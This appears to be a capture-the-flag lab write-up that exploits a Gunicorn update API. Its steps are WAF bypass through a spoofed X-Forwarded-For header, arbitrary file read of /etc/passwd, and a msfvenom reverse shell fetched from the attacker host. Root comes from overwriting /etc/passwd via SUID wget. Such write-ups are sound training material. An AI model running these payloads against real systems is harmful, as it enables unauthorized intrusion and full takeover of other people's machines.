Enumeration
Copy ...
13337/tcp open http Gunicorn 20.0.4
| http-methods:
|_ Supported Methods: GET OPTIONS HEAD
|_http-server-header: gunicorn/20.0.4
|_http-title: Remote Software Management API
... /logs
Methods: GET
/update
Methods: POST
Updates the app using a linux executable. Content-Type: application/json {"user":"", "url":""}
/restart
Methods: GET
Copy POST /update HTTP/1.1
...
Content-Type: application/json
Content-Length: 48
{"user":"test", "url":"http://192.168.49.60/"}
Response:
Invalid username. We need a valid username.
Copy GET /logs HTTP/1.1
Response:
WAF: Access Denied for this Host. Added to request header -> X-Forwarded-For: 127.0.0.1
Copy GET /logs HTTP/1.1
...
X-Forwarded-For: 127.0.0.1
Response:
Error! No file specified. Use file=/path/to/log/file to access log files.
Copy GET /logs?file=/etc/passwd HTTP/1.1
...
X-Forwarded-For: 127.0.0.1
Response:
root:x:0:0:root:/root:/bin/bash
...
clumsyadmin:x:1000:1000::/home/clumsyadmin:/bin/sh Initial Access
Copy $ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.60 LPORT=80 -f elf -o reverse.elf
Copy POST /update HTTP/1.1
...
Content-Type: application/json
{"user":"clumsyadmin", "url":"http://192.168.49.60/shell.sh"}
Response:
Update requested by clumsyadmin. Restart the software for changes to take effect.
Copy GET /restart HTTP/1.1
POST /restart HTTP/1.1
...
{"confirm":"true"} PrivEsc
Copy clumsyadmin@xposedapi:/tmp$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/wget Copy contents of /etc/passwd to your host as passwd.
Add this user with this command:
Copy echo "ch:\$1\$ignite\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash" >> passwd ch:pass123
Copy clumsyadmin@xposedapi:/$ wget http://192.168.49.60/passwd -O /etc/passwd
clumsyadmin@xposedapi:/$ su ch
password:pass123 